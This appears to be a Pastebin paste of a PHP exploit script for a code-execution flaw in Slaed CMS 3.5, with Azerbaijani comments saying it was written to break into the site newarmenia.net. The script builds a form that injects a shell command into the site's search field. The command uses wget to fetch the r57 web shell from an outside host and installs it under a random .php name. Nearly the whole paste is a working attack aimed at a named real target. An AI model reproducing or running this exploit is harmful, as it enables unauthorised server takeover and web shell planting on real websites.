Advertisement
Guest User

asasas

a guest
Mar 30th, 2012
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.65 KB | None | 0 0
  1. <?php
  2. /*
  3.  
  4. Slaed 3.5 PHP Code Execution Exploit By AkaStep !!!
  5. ~~~~~~~~~ Vuln Discovered By Pun!sh3r (Respect!) ~~~~~~~
  6. Exploit shell_exec() funksiyasindan istifade edir.
  7. Sirf bu serverde safe_mode off oldugundan s*kmek problemsizdir))
  8. Diger versiyasi bu exploitin yazilib safe_mode ON/OFF girmir ona(Privatedir)
  9. (31.03.2012)
  10.  
  11. */
  12.  
  13.  
  14. $shell='http://r57.biz/r57.txt';
  15.  
  16.  
  17. if($_SERVER['REQUEST_METHOD'] !=='POST')
  18. {
  19. $rndname=substr(sha1(md5(rand(4545151,589412) . md5(time()))),0,8) . '.php';
  20. }
  21.  
  22.  
  23. $shellurlishere='http://www.newarmenia.net/' . $rndname;
  24.  
  25. echo str_repeat('<ul>',4) .
  26. '<h1>Slaed 3.5 PHP Code Execution Exploit By AkaStep !!!
  27. <br>~~~~~~~~~ Vuln Discovered By Pun!sh3r (Respect!) ~~~~~~~
  28. <br>
  29. Bu exploit xususile newarmenia.net saytini S*kmek ucun yazilib.
  30. <br>(31.03.2012)<br>
  31. </h1>
  32. <br>
  33. <br><p>Shellin Unvanini Submitden sonra olacaq:(Yaz onu Notepada Indiden)<br>
  34. Bu her defe deyisilir!
  35. <font color="red" size="4">' . $shellurlishere. '</font>
  36. <br>
  37. Submit Duymesini Basan kimi Yeni bir URL acilacaq (shellin unvani)<br>
  38. O NOT FOUND vere biler bu halda sadece hemin Not Found veren shell <br>
  39. unvanini Refresh ele shell acilacaq.</p>' .
  40. '<form action="http://www.newarmenia.net/index.php?name=Search" method="post">' .PHP_EOL .
  41. '<input type="hidden" readonly="true" name="word" value="mod=Links&amp;word=${@`wget ' . $shell . ';' . 'mv r57.txt ' . $rndname . '`}"'. '/>'. PHP_EOL .
  42. '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  43. <input type="submit" title="Pwn It Now" value="Lets Fuck Bitchez!" onclick="document.forms[0].submit();window.open(\'' . $shellurlishere . '\');" />' .PHP_EOL .
  44. '</form>'. str_repeat('</ul>',4) .PHP_EOL;
  45.  
  46.  
  47. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement